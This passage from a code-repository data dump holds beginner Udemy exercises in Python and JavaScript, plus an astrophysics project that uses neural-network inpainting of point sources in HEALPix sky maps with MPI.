that line of javascript runs, we don't want\r\n// the addListAfterClick function to run because we're adding the event\r\n//listener now to wait for click or keypress\r\n//We're passing a reference to the function without running it\r\nbutton.addEventListener(\"click\", addListAfterClick);\r\n\r\ninput.addEventListener(\"keypress\", addListAfterKeypress);" }, { "alpha_fraction": 0.6623376607894897, "alphanum_fraction": 0.6623376607894897, "avg_line_length": 50, "blob_id": "ab5d9f43e8ea4c0f41a428536cfdacbd7b4cd328", "content_id": "a24357437ad331b94ccefd1fdbec425c71b98f16", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 154, "license_type": "no_license", "max_line_length": 68, "num_lines": 3, "path": "/Python/PasswordChecker.py", "repo_name": "xiam220/UdemyCourses", "src_encoding": "UTF-8", "text": "username = input(\"Enter your username: \")\r\npassword = input(\"Enter your password: \")\r\nprint(f\"Username: {username} \\n Password: \" + {'*' * len(password)})" }, { "alpha_fraction": 0.5715509653091431, "alphanum_fraction": 0.5912596583366394, "avg_line_length": 21.44230842590332, "blob_id": "caae67d4990d7d581430b14d7f1e810166dd5bcd", "content_id": "7ca412c2708d23ed17945865d563d2c22d18f4a1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1167, "license_type": "no_license", "max_line_length": 61, "num_lines": 52, "path": "/Python/Lists.py", "repo_name": "xiam220/UdemyCourses", "src_encoding": "UTF-8", "text": "Lists and List Splicing\n \"\"\"\n Lists are a form of arrays, a collection of items\n Lists are mutable, meaning they can be changed\n You are creating a new copy of a list\n \"\"\"\n\n amazon_cart = ['notebooks', 'sunglasses', 'toys', 'grapes']\n\n print(amazon_cart)\n #Output: ['notebooks', 'sunglasses', 'toys', 'grapes']\n\n print(amazon_cart[0])\n #Output: notebooks\n\n amazon_cart[0] = 'laptop'\n print(amazon_cart)\n #Output: ['laptop', 
'sunglasses', 'toys', 'grapes']\n\n \"\"\"\n Changing the pointer of arr1 to arr2\n Modifications to arr1 or arr2 will modify the other array\n arr2 = arr1\n \"\"\"\n new_cart = amazon_cart\n new_cart = 'gum'\n print(new_cart)\n #Output: ['gum', 'sunglasses', 'toys', 'grapes']\n\n print(amazon_cart)\n #Output: ['gum', 'sunglasses', 'toys', 'grapes']\n\n \"\"\"\n Copying an array\n arr2 = arr1[:]\n \"\"\"\n new_cart = amazon_cart[:]\n new_cart[0] = 'gum'\n print(new_cart)\n #Output: ['gum', 'sunglasses', 'toys', 'grapes']\n\n print(amazong_cart)\n #Output: ['laptop', 'sunglasses', 'toys', 'grapes']\n \nMatrices\n matrix = [\n [1, 5, 1],\n [0, 1, 0],\n [1, 0, 1]\n ]\n print(matrix[0][1])\n #Output: 5\n" }, { "alpha_fraction": 0.6308540105819702, "alphanum_fraction": 0.6570248007774353, "avg_line_length": 22.133333206176758, "blob_id": "b0abd534dd9180d8c660134c732d09e32639550f", "content_id": "386513bc53d32b34998d252ab401c08116c3c7d2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 726, "license_type": "no_license", "max_line_length": 60, "num_lines": 30, "path": "/Python/scrape.py", "repo_name": "xiam220/UdemyCourses", "src_encoding": "UTF-8", "text": "import requests #allows us to download the HTML\r\nfrom bs4 import BeautifulSoup\r\n\r\n #web browser without the actual window\r\nresponse = requests.get('https://news.ycombinator.com/news')\r\n# print(response.text)\r\n\r\n# parse HTML; creates a soup object\r\nsoup = BeautifulSoup(response.text, 'html.parser')\r\n# print(soup.body.contents)\r\n\r\n# print(soup.find_all('div'))\r\n# print(soup.title)\r\n\r\n# find the first a\r\n# print(soup.find('a'))\r\n\r\n# print(soup.find(id='score_24954495'))\r\n\r\n# uses CSS selectors\r\n# . 
--> class\r\n# print(soup.select('.score'))\r\n# # --> id\r\n# print(soup.select('#score_24954495'))\r\n\r\nlinks = soup.select('.storylink')\r\nvotes = soup.select('.score')\r\n# print(votes[0])\r\n\r\nprint(votes[0].get('id'))\r\n\r\n" }, { "alpha_fraction": 0.7018633484840393, "alphanum_fraction": 0.7018633484840393, "avg_line_length": 36.75, "blob_id": "7186d22c44317c499c79170912c7961c3b2532d2", "content_id": "038b104a30938830e2f8d64987b2578d02de2767", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 161, "license_type": "no_license", "max_line_length": 55, "num_lines": 4, "path": "/WebDevelopment/Javascript/exercise3_Calculator/Calculator.js", "repo_name": "xiam220/UdemyCourses", "src_encoding": "UTF-8", "text": "var firstNumber = prompt(\"Enter the first number: \");\r\nvar secondNumber = prompt(\"Enter the second number: \");\r\n\r\nconsole.log(firstNumber + secondNumber)\r\n\r\n\r\n\r\n" }, { "alpha_fraction": 0.6118143200874329, "alphanum_fraction": 0.6329113841056824, "avg_line_length": 22.549999237060547, "blob_id": "6c984a1af81c8b4eaff18c58340c8a3a79e24d92", "content_id": "910d8ac2db572bb93c85100897992aef672ee43d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 474, "license_type": "no_license", "max_line_length": 65, "num_lines": 20, "path": "/Python/PythonBasics1.py", "repo_name": "xiam220/UdemyCourses", "src_encoding": "UTF-8", "text": "Determine User Age\n birth_year = input('What year were you born?')\n age = 2019 - int(birth_year)\n print(f'Your age is: {age}')\n \n \"\"\"\n Console:\n What year were you born?1999\n Your age is: 20\n >\n \"\"\"\n\nPassword Checker\n username = input('Enter your username: ')\n password = input('Enter your password: ')\n \n password_length = len(password)\n hidden_password = '*' * password_length\n \n print(f'Username: {username} \\n Password: {hidden_password}')\n \n" } ]
10
sopXx/picasso
https://github.com/sopXx/picasso
794c3166bcafa1622f15cf4da91fcd911f093771
0e488112688b91fd879bb5a8d67b2eee0651bed2
1e1ff6d4f54ee4ed348c2593fae8ab0fe35b906a
refs/heads/master
2020-07-07T05:00:25.411225
2019-08-20T00:06:47
2019-08-20T00:06:47
203,258,424
0
0
null
2019-08-19T22:22:17
2019-08-16T19:41:20
2019-08-16T19:42:42
null
[ { "alpha_fraction": 0.632478654384613, "alphanum_fraction": 0.6666666865348816, "avg_line_length": 28, "blob_id": "eccc13ad6f2e00e46376a6b75bb3a04838945396", "content_id": "f6a72a50483931f992d44e897c97623bf81611e9", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 117, "license_type": "permissive", "max_line_length": 60, "num_lines": 4, "path": "/picasso/utils/__init__.py", "repo_name": "sopXx/picasso", "src_encoding": "UTF-8", "text": "# Copyright (c) 2019 Giuseppe Puglisi .\n# Full license can be found in the top level \"LICENSE\" file.\n\nfrom .utils import * \n" }, { "alpha_fraction": 0.5284327268600464, "alphanum_fraction": 0.5464632511138916, "avg_line_length": 27.799999237060547, "blob_id": "09bc7493c1f2ff0295f83eb031028b3fcce15ce1", "content_id": "8127f960f7dc391347748f92c2d4336c91682c72", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 721, "license_type": "permissive", "max_line_length": 83, "num_lines": 25, "path": "/picasso/inpainters/nn_inpainter.py", "repo_name": "sopXx/picasso", "src_encoding": "UTF-8", "text": "import numpy as np\n\n\nclass NN():\n\t\n\tdef NN_fill(mask, data, niter):\n\t\t'''\n\t\tmask: binary mask with the hole as 0, and the rest of as 1\n\t\tdata: input nonmasked data (1 channel)\n\t\tniter: number of iterations. The saturation iterations depends on the mask size. 
\n\t\t (a mask size of ~300 takes about ~50 iters) \n\t\t'''\n\t data = data.copy()\n\t mask_pos = np.where(mask==0)\n\t h, w = data.shape\n\t x, y = mask_pos\n\t data[~mask] = np.mean(data*mask)\n\t for i in range(niter):\n\t for r,c in zip(x,y):\n\t try:\n\t data[r,c] = data[(r-1):(r+2),(c-1):(c+2)].mean()\n\t except IndexError:\n\t \tprint('Mask index out of range')\n\t pass\n\t return data\n\t" }, { "alpha_fraction": 0.5861280560493469, "alphanum_fraction": 0.6006097793579102, "avg_line_length": 30.238094329833984, "blob_id": "950a728d7181c3a5e47547bc9211c413f8e37959", "content_id": "37f649252172e703f18973e5dc6a2970d084acaf", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5248, "license_type": "permissive", "max_line_length": 137, "num_lines": 168, "path": "/picasso/MPI_stack2healpix.py", "repo_name": "sopXx/picasso", "src_encoding": "UTF-8", "text": "#\n#\n#\n#\n# date: 2019-08-20\n# author: GIUSEPPE PUGLISI\n# python3.6\n# Copyright (C) 2019 Giuseppe Puglisi [email protected]\n#\n\n\nimport healpy as hp\nimport numpy as np\nimport argparse\nfrom mpi4py import MPI\n\n\nfrom inpainters import (\n deep_prior_inpainter as dp ,\n contextual_attention_gan as ca,\n nn_inpainter as nn\n )\n\n\nfrom utils import utils\n\nfrom utils import (\n setup_input,\n set_header,\n f2h,\n rd2tp,\n numpy2png\n\n)\n\n\n\n\n\n\nclass HoleInpainter() :\n def __init__ (self, method , Npix = 128, modeldir = None, verbose= False ) :\n if method =='Deep-Prior':\n self.Inpainter = dp.DeepPrior ( (Npix, Npix, 1), verbose = verbose )\n self.epochs = 2#000\n Adaopt=\"Adam\"\n self.Inpainter.compile(optimizer=Adaopt )\n self.exec = self.DPinpaint\n \n elif method=='Contextual-Attention' :\n self.Inpainter = ca.ContextualAttention( modeldir =modeldir , verbose = verbose )\n self.exec = self.GANinpaint\n elif method=='NN' :\n self.Inpainter = nn.NN_fill(())\n \n pass\n\n\n def setup_input(self , fname ) :\n return 
self.Inpainter.setup_input( fname )\n\n\n\n def rescale_back (self, v ) :\n return ( v* (self.Inpainter.max - self.Inpainter.min) +\n self.Inpainter.min )\n\n\n def DPinpaint(self ) :\n\n self.Inpainter.train(self.Inpainter.Z , self.Inpainter.X , epochs=self.epochs )\n self.Inpainter.evaluate(self.Inpainter.Z,self.Inpainter.X)\n # predict and rescale back\n p = self.Inpainter.predict(self.Inpainter.Z)\n p = self.rescale_back(p )\n return p\n\n def GANinpaint (self ) :\n image = numpy2png(self.Inpainter.X )\n mask = numpy2png (1 - self.Inpainter.mask )\n\n p = self.Inpainter.predict(image, mask )\n p = self.rescale_back(p )\n\n return p\n\n\ndef main(args):\n comm = MPI.COMM_WORLD\n rank = comm.Get_rank()\n nprocs = comm.Get_size()\n Npix = 128 ## WARNING: This is hard-coded because of the architecture of both CNN\n\n glob_ra,glob_dec, _ = np.loadtxt(args.ptsourcefile ,unpack=True)\n\n localsize =np.int_( glob_ra.shape[0]/nprocs ) ## WARNING: this MUST evenly divide!!!!!!\n\n ra = glob_ra[slice( rank *localsize , (rank +1)* localsize)]\n dec = glob_dec[slice( rank *localsize , (rank +1)* localsize)]\n Nstacks= ra.shape [0]\n\n if args.pol :\n keys = ['T', 'Q', 'U']\n inputmap = hp.read_map(args.hpxmap ,field=[0,1,2] )\n else:\n keys = ['T' ]\n inputmap = [hp.read_map( args.hpxmap) ]\n\n\n mask = np.zeros_like (inputmap[0] )\n\n nside = hp.get_nside(inputmap)\n\n size_im = {2048: 192. ,4096 : 64., 32 :360. }\n beam =np.deg2rad( args.beamsize /60.)\n\n Inpainter = HoleInpainter (args.method,\n modeldir = args.checkpoint_dir,\n verbose =args.debug )\n\n for i in range(Nstacks):\n\n sizepatch = size_im[nside]*1. 
/Npix/60.\n header = set_header(ra[i],dec[i], sizepatch )\n tht,phi = rd2tp(ra[i],dec[i])\n vec = hp.ang2vec( theta = tht,phi =phi )\n pixs = hp.query_disc(nside,vec,3* beam)\n mask [pixs] = 1.\n for k,j in zip(keys, range(len(inputmap)) ) :\n fname = args.stackfile+k+'_{:.5f}_{:.5f}_masked.npy'.format(ra[i],dec[i] )\n fname = args.stackfile\n\n Inpainter.setup_input( fname )\n predicted = Inpainter.exec ()\n\n np.save(args.stackfile+k+'_{:.5f}_{:.5f}_inpainted.npy'.format(ra[i],dec[i] ), predicted)\n maskmap = f2h (predicted ,header, nside )\n inputmap[j][pixs] = inpaintedmap[pixs]\n break\n\n maps = np.concatenate(inputmap).reshape(hp.nside2npix(nside), len(inputmap))\n reducmaps = np.zeros_like(maps)\n globmask= np.zeros_like(mask)\n\n comm.Allreduce(maps, reducmaps, op=MPI.SUM)\n comm.Allreduce(mask, globmask , op=MPI.SUM)\n if rank ==0 :\n hp.write_map(args.inpaintedmap , [inputmap[k] *(1- globmask) + reducmaps[:,k] *globmask for k in range(len(inputmap))] )\n\n comm.Barrier()\n\n comm.Disconnect\n\n\n\nif __name__==\"__main__\":\n\tparser = argparse.ArgumentParser( description=\"prepare training and testing dataset from a healpix map \" )\n\tparser.add_argument(\"--hpxmap\" , help='path to the healpix map to be stacked, no extension ' )\n\tparser.add_argument(\"--beamsize\", help = 'beam size in arcminutes of the input map', type=np.float )\n\tparser.add_argument(\"--stackfile\", help='path to the file with stacked maps')\n\tparser.add_argument(\"--ptsourcefile\", help='path to the file with RA, Dec coordinates of sources to be inpainted ')\n\tparser.add_argument(\"--inpaintedmap\", help='path to the inpainted HEALPIX map ')\n\tparser.add_argument(\"--method\", help=\" string of inpainting technique, can be 'Deep-Prior', 'Contextual-Attention'. 
\")\n\tparser.add_argument(\"--pol\", action=\"store_true\" , default=False )\n\tparser.add_argument('--checkpoint_dir', default='', type=str,help='The directory of tensorflow checkpoint for the ContextualAttention.')\n\tparser.add_argument('--debug', default=False , action='store_true')\n\targs = parser.parse_args()\n\tmain( args)\n" }, { "alpha_fraction": 0.5613734126091003, "alphanum_fraction": 0.6025751233100891, "avg_line_length": 29.259740829467773, "blob_id": "de176a39c4e28ec69cf4040793940818d1dbad58", "content_id": "bae71570242f1d38054cb6dfda5d994e5e3cbb30", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2330, "license_type": "permissive", "max_line_length": 74, "num_lines": 77, "path": "/picasso/utils/utils.py", "repo_name": "sopXx/picasso", "src_encoding": "UTF-8", "text": "import reproject\nimport numpy as np\nimport astropy.io.fits as fits\n\n\ndef h2f(hmap,target_header,coord_in='C'):\n #project healpix -> flatsky\n pr,footprint = reproject.reproject_from_healpix(\n (hmap, coord_in), target_header, shape_out=(500,500),\n order='nearest-neighbor', nested=False)\n return pr\n\ndef f2h(flat,target_header,nside,coord_in='C'):\n #project flatsky->healpix\n pr,footprint = reproject.reproject_to_healpix(\n (flat, target_header),coord_system_out='C', nside=nside ,\n order='nearest-neighbor', nested=False)\n return pr\n\ndef rd2tp(ra,dec):\n \"\"\"\n Convert ra,dec -> tht,phi\n \"\"\"\n tht = (-dec+90.0)/180.0*np.pi\n phi = ra/180.0*np.pi\n return tht,phi\n\ndef tp2rd(tht,phi):\n \"\"\"\n Convert tht,phi -> ra,dec\n \"\"\"\n ra = phi/np.pi*180.0\n dec = -1*(tht/np.pi*180.0-90.0)\n return ra,dec\n\n\ndef set_header(ra,dec, size_patch ,Npix=128 ):\n hdr = fits.Header()\n hdr.set('SIMPLE' , 'T')\n hdr.set('BITPIX' , -32)\n hdr.set('NAXIS' , 2)\n hdr.set('NAXIS1' , Npix)\n hdr.set('NAXIS2' , Npix )\n hdr.set('CRVAL1' , ra)\n hdr.set('CRVAL2' , dec)\n hdr.set('CRPIX1' , Npix/2. 
+.5)\n hdr.set('CRPIX2' , Npix/2. +.5 )\n hdr.set('CD1_1' , size_patch )\n hdr.set('CD2_2' , -size_patch )\n hdr.set('CD2_1' , 0.0000000)\n hdr.set('CD1_2' , -0.0000000)\n hdr.set('CTYPE1' , 'RA---ZEA')\n hdr.set('CTYPE2' , 'DEC--ZEA')\n hdr.set('CUNIT1' , 'deg')\n hdr.set('CUNIT2' , 'deg')\n hdr.set('COORDSYS','icrs')\n return hdr\n\n\ndef numpy2png (arr ):\n image = np.uint8( 255 * arr )\n # replicate image to the 3 channels\n image = image [:,:,None] * np.ones(3, dtype=int)[None, None, :]\n return image\n\ndef setup_input ( fname_masked, seed= 123456789, method = 'Deep-Prior' ):\n maskdmap=np.load(fname_masked)\n holemask = np.ma.masked_not_equal(maskdmap,0) .mask\n maxval = maskdmap[holemask].max() ; minval = maskdmap[holemask].min()\n maskdmap = np.expand_dims(np.expand_dims( maskdmap, axis=0), axis=-1)\n maskdmap = (maskdmap -minval) / (maxval - minval)\n if method =='Deep-Prior':\n randstate= np.random.RandomState(seed)\n noisemap = randstate.uniform( size=maskdmap.shape )\n return [ maskdmap, noisemap , minval, maxval]\n else :\n return maskdmap, minval, maxval\n" }, { "alpha_fraction": 0.5251629948616028, "alphanum_fraction": 0.5543676614761353, "avg_line_length": 32.640350341796875, "blob_id": "9431e2d5f78e84d53d1d6a31cdb757be5548e225", "content_id": "60238f0a3616c7ca1f4a34ea6ba7af98ee6dde9e", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3835, "license_type": "permissive", "max_line_length": 108, "num_lines": 114, "path": "/picasso/MPI_healpix2stack.py", "repo_name": "sopXx/picasso", "src_encoding": "UTF-8", "text": "#\n#\n#\n#\n# date: 2019-08-20\n# author: GIUSEPPE PUGLISI\n# python3.6\n# Copyright (C) 2019 Giuseppe Puglisi [email protected]\n#\n\n\nimport healpy as hp\nimport numpy as np\nimport argparse\nfrom mpi4py import MPI\n\nfrom utils import utils\n\nfrom utils import (\n setup_input,\n h2f,\n set_header,\n rd2tp\n\n)\n\n\n\ndef main(args):\n\n comm = MPI.COMM_WORLD\n rank = 
comm.Get_rank()\n nprocs = comm.Get_size()\n glob_ra,glob_dec, _ = np.loadtxt(args.ptsourcefile ,unpack=True)\n\n localsize = glob_ra.shape[0]/nprocs ## WARNING: this MUST evenly divide!!!!!!\n\n ra = glob_ra[slice( rank *localsize , (rank +1)* localsize)]\n dec = glob_dec[slice( rank *localsize , (rank +1)* localsize)]\n\n Nstacks= ra.shape [0]\n Npix = 128 #This is hard-coded because of the architecture of both CNN\n if args.pol :\n keys = ['T', 'Q', 'U']\n inputmap = hp.read_map(args.hpxmap ,field=[0,1,2] )\n else:\n keys = ['T' ]\n\n inputmap = [hp.read_map( args.hpxmap) ]\n\n mask = np.ones_like (inputmap[0] )\n beam =np.deg2rad( args.beamsize /60.)\n\n\n nside = hp.get_nside(inputmap)\n size_im = {2048: 192. ,4096 : 64. }\n for i in range(Nstacks):\n sizepatch = size_im[nside]*1. /Npix/60.\n header = set_header(ra[i],dec[i], sizepatch )\n\n tht,phi = rd2tp(ra[i],dec[i])\n vec = hp.ang2vec( theta = tht,phi =phi )\n pixs = hp.query_disc(nside,vec,3* beam)\n mask[pixs] = 0\n\n for k,j in zip(keys, range(len(inputmap)) ) :\n \tnp.save(args.stackfile+k+'_{:.5f}_{:.5f}_masked'.format(ra[i],dec[i] ),\n h2f(mask * inputmap[j] ,header))\n \tnp.save(args.stackfile+k+'_{:.5f}_{:.5f}'.format(ra[i],dec[i]) , h2f(inputmap[j] ,header) )\n\n if i %100 ==0 and rank ==0 :\n print(\"Stacking %d source \"%i )\n\n\n comm.Barrier()\n\n if rank ==0 :\n print (\"collecting stacks to 1 single file\" )\n globT = np.zeros( (Nstacks, 128,128))\n mglobT = np.zeros( (Nstacks, 128,128))\n if args.pol :\n globQ = np.zeros( (Nstacks, 128,128))\n globU = np.zeros( (Nstacks, 128,128))\n mglobQ = np.zeros( (Nstacks, 128,128))\n mglobU = np.zeros( (Nstacks, 128,128))\n for i in range(Nstacks):\n globT[i,:,: ] =np.load (args.stackfile+ 'T_{:.5f}_{:.5f}.npy'.format(ra[i],dec[i] ))\n mglobT[i,:,: ] =np.load (args.stackfile+ 'T_{:.5f}_{:.5f}_masked.npy'.format(ra[i],dec[i] ))\n if args.pol:\n globQ[i,:,: ] =np.load (args.stackfile+ 'Q_{:.5f}_{:.5f}.npy'.format(ra[i],dec[i] ))\n mglobQ[i,:,: ] 
=np.load (args.stackfile+ 'Q_{:.5f}_{:.5f}_masked.npy'.format(ra[i],dec[i] ))\n globU[i,:,: ] =np.load (args.stackfile+ 'U_{:.5f}_{:.5f}.npy'.format(ra[i],dec[i] ))\n mglobU[i,:,: ] =np.load (args.stackfile+ 'U_{:.5f}_{:.5f}_masked.npy'.format(ra[i],dec[i] ))\n np.save(args.stackfile+'T_masked', mglobT)\n np.save(args.stackfile+'T' , globT)\n if args.pol:\n np.save(args.stackfile+'Q_masked', mglobQ)\n np.save(args.stackfile +'Q', globQ)\n np.save(args.stackfile+'U_masked', mglobU)\n np.save(args.stackfile+'U' , globU)\n comm.Barrier()\n\n comm.Disconnect\n\n\n\nif __name__==\"__main__\":\n\tparser = argparse.ArgumentParser( description=\"prepare training and testing dataset from a healpix map \" )\n\tparser.add_argument(\"--hpxmap\" , help='path to the healpix map to be stacked, no extension ' )\n\tparser.add_argument(\"--beamsize\", help = 'beam size in arcminutes of the input map', type=np.float )\n\tparser.add_argument(\"--stackfile\", help='path to the file with stacked maps')\n\tparser.add_argument(\"--pol\", action=\"store_true\" , default=False )\n\targs = parser.parse_args()\n\tmain( args)\n" }, { "alpha_fraction": 0.5742760300636292, "alphanum_fraction": 0.5874388813972473, "avg_line_length": 31.414634704589844, "blob_id": "90e9b5d378ed8ac2d6f9982b90de55e39202fdae", "content_id": "991c9aa4d03b543410d1ef17a9b296040a6e07eb", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2659, "license_type": "permissive", "max_line_length": 77, "num_lines": 82, "path": "/picasso/inpainters/contextual_attention_gan.py", "repo_name": "sopXx/picasso", "src_encoding": "UTF-8", "text": "\n#\n#\n#\n#\n# date: 2019-08-20\n# author: GIUSEPPE PUGLISI\n# python3.6\n# Copyright (C) 2019 Giuseppe Puglisi [email protected]\n#\n\n\n\nimport numpy as np\nimport tensorflow as tf\nimport neuralgym as ng\nfrom .generative_inpainting_model import InpaintCAModel\n\nclass ContextualAttention(InpaintCAModel) :\n def __init__(self, 
modeldir = None , verbose=False ):\n self.checkpoint_dir = modeldir\n self.verbose=verbose\n\n super(ContextualAttention , self).__init__()\n\n def setup_input(self,fname_masked ):\n maskdmap=np.load(fname_masked)\n holemask = np.ma.masked_not_equal(maskdmap,0) .mask\n maxval = maskdmap[holemask].max() ; minval = maskdmap[holemask].min()\n maskdmap = (maskdmap -minval) / (maxval - minval)\n self.X = maskdmap;\n self.mask = np.int_(holemask )\n self.min = minval; self.max = maxval\n pass\n\n def preprocess_input ( self, image, mask ) :\n self.h, self.w,_ = image.shape\n grid = 8\n image = image[:self.h//grid*grid, :self.w//grid*grid, :]\n mask = mask[:self.h//grid*grid, :self.w//grid*grid, :]\n\n if self.verbose : print('Shape of image: {}'.format(image.shape))\n\n image = np.expand_dims(image, 0)\n mask = np.expand_dims(mask, 0)\n input_image = np.concatenate([image, mask], axis=2)\n input_image = tf.constant(input_image, dtype=tf.float32)\n return input_image\n\n\n def postprocess_output ( self, output,sess ):\n\n output = (output + 1.) 
* 127.5\n output = tf.reverse(output, [-1])\n output = tf.saturate_cast(output, tf.uint8)\n # load pretrained model\n vars_list = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES)\n assign_ops = []\n for var in vars_list:\n vname = var.name\n from_name = vname\n var_value = tf.contrib.framework.load_variable(\n self.checkpoint_dir,\n from_name)\n assign_ops.append(tf.assign(var, var_value))\n sess.run(assign_ops)\n if self.verbose : print('ContextualAttention Model loaded.')\n result = sess.run(output)\n\n outarray = result[0][:, :, ::-1].mean(axis=-1,\n keepdims=1) .reshape(self.h,self.w)\n return outarray /255.\n\n\n def predict (self, image , mask ):\n\n sess_config = tf.ConfigProto()\n sess_config.gpu_options.allow_growth = True\n with tf.Session(config=sess_config) as sess:\n input_image = self.preprocess_input( image, mask )\n output = self.build_server_graph(input_image)\n out = self.postprocess_output(output, sess )\n return out\n" }, { "alpha_fraction": 0.7333333492279053, "alphanum_fraction": 0.7333333492279053, "avg_line_length": 23.363636016845703, "blob_id": "ab0fa36d040aaca66232c22e5bc542960e367b28", "content_id": "6e3731d3121785f74420addbff663b4023cf6c89", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 270, "license_type": "permissive", "max_line_length": 94, "num_lines": 11, "path": "/README.md", "repo_name": "sopXx/picasso", "src_encoding": "UTF-8", "text": "# picasso\nPython Inpainter for Cosmological and Astrophysical SOurces \n\n- Deep Prior Inpainter\t \n- Contextual Attention (WGAN ) \n\n# Requirements\n\n- `tensorflow` \n- `keras` \n- ( to run GAN inpainter ) `neuralgym `pip install git+https://github.com/JiahuiYu/neuralgym`\n\n\n" } ]
7
KevinAS28/Python-share-send-and-receive-files
https://github.com/KevinAS28/Python-share-send-and-receive-files
4e2c1139df14ef89157b6b862964013decd5a7f5
90c4bfd19a4a77574efdb42dc8c73f1723343859
617d61bdcabd7d64dc7d401d76b49412ab5e0005
refs/heads/master
2020-04-23T16:03:08.060940
2019-02-18T12:59:30
2019-02-18T12:59:30
171,284,833
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6188833117485046, "alphanum_fraction": 0.6286072731018066, "avg_line_length": 26.921052932739258, "blob_id": "40b06268cf8df890ee2dff4cd16f4d60a1088399", "content_id": "cfc4c87cf9deb57e3307bb5d90cfc9b50e72a88f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3188, "license_type": "no_license", "max_line_length": 158, "num_lines": 114, "path": "/simple-ftp.py", "repo_name": "KevinAS28/Python-share-send-and-receive-files", "src_encoding": "UTF-8", "text": "import socket\nimport getopt\nimport os\nimport sys\nfrom threading import Thread\n\ndef usage():\n print(\"Simple FTP by Kevin Agusto\")\n print(\"to receive files, simply python simftp.py -ip <your ip (not necessary)> -p <port number> -r -l </home/my/location/ (all your files will downloaded)>\")\n print('to send a file, python simftp.py -ip <ip> -p <port number> -s \"myfile.rar\" ')\n print('to multiple files, python simftp.py -ip <ip> -p <port number> -s \"myfile.rar yourfile.rar /home/thisisfile.exe\" ')\n print(\"or just hit python simftp.py to guided options\")\n sys.exit(0)\n return\n\nglobal the_files\nmode = \"g\" #guided\nip = \"\"\nport = 21\nthe_files = []\n \ntry:\n opts, args = getopt.getopt(sys.argv[1:], \"hle:a:p:m:f\", [\"help\", \"address\", \"port\", \"mode\", \"files\"])\nexcept getopt.GetoptError as jadierror:\n print(str(jadierror))\n usage()\n\nfor o, a in opts:\n if o in [\"-a\", \"--addr\", \"-addr\", \"--address\"]:\n ip = str(a)\n elif o in [\"-p\", \"--port\"]:\n port = int(a)\n elif o in [\"-m\", \"--mode\"]:\n mode = str(a)\n elif o in [\"-h\", \"--help\"]:\n usage()\n elif o in [\"-f\", \"--files\"]:\n the_files = args[0].split()\n \nif mode == \"g\":\n mode = str(input(\"you will receive files or send files? 
[R/S] \")).lower()\n if mode == \"r\":\n ip = str(input(\"your ip: (not necessary) \"))\n port = str(input(\"port number (21 is default): \"))\n if not len(port):\n port = 21\n else:\n port = int(port)\n the_files = str(input(\"the address files will downloaded(not necessary): \"))\n if not len(the_files):\n the_files = str(os.getcwd())\n \n if mode == \"s\":\n ip = str(input(\"the receiver ip: \"))\n if ip==\"\":\n print(\"error, ip must be exist\")\n sys.exit(0)\n port = input(\"the receiver port: (21 is default) \")\n if not len(port):\n port = 21\n else:\n port = int(port)\n the_files.clear()\n while True:\n what = str(input(\"type the file address or file name (if you finsih, just hit enter with blank): \"))\n if not len(what):\n break\n the_files.append(what)\n\ntcp_ip = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\ndef sendfiles():\n global the_files\n global ip\n global port\n tcp_ip.connect((ip, port))\n for a in the_files:\n to_send = b\"%s<this is seperate>\" %(bytes(a.encode(\"utf-8\")))\n with open(a, \"rb\") as the_data:\n to_send += the_data.read()\n tcp_ip.send(to_send)\n print(tcp_ip.recv(4096).decode(\"utf-8\"))\n tcp_ip.close()\n\nclass recvfiles:\n global the_files\n def __init__(self):\n global the_files\n if not os.access(the_files, os.R_OK):\n print(\"[WARNING] the directory is cannot be accessed\")\n the_files = str(os.getcwd())\n os.chdir(the_files)\n tcp_ip.bind((ip, port))\n tcp_ip.listen()\n \n def client_handler(self, client_socket):\n data = client_socket.recv(1024).split(b\"<this is seperate>\")\n open(data[0], \"w+\")\n with open(data[0], \"wb\") as yeah:\n yeah.write(data[1])\n client_socket.send((\"successfull send %s\" %(data[0])).encode(\"utf-8\"))\n client_socket.close()\n def run(self):\n print(\"Waiting for sender...\")\n while True:\n client, addr = tcp_ip.accept()\n print(\"Received incoming data from %s:%d\" %(addr[0], addr[1]))\n Thread(target=self.client_handler, args=[client]).start()\n\nif __name__ == 
\"__main__\":\n if mode == \"r\":\n recvfiles().run()\n else:\n sendfiles()\n \n " }, { "alpha_fraction": 0.8055555820465088, "alphanum_fraction": 0.8055555820465088, "avg_line_length": 53, "blob_id": "05afbba6caada01add428cca0d9ed8715b3be953", "content_id": "14b81a2e427ed2555905707eb3cfbf01189a21b3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 108, "license_type": "no_license", "max_line_length": 98, "num_lines": 2, "path": "/README.md", "repo_name": "KevinAS28/Python-share-send-and-receive-files", "src_encoding": "UTF-8", "text": "A python program to send and receive files. its not using FTP protocols. just using TCP connection\nKevin AS\n" } ]
2
chandrab/bombogenesis
https://github.com/chandrab/bombogenesis
480fc776acc6153286c1191a00a82f730744fd67
42c600242922ccc2aa527e6375f45de39fd3f397
34ec1a6e5704cdec65474eb90190190f693296f1
refs/heads/master
2021-03-20T06:37:48.019261
2019-03-21T22:33:12
2019-03-21T22:33:12
null
0
0
null
null
null
null
null
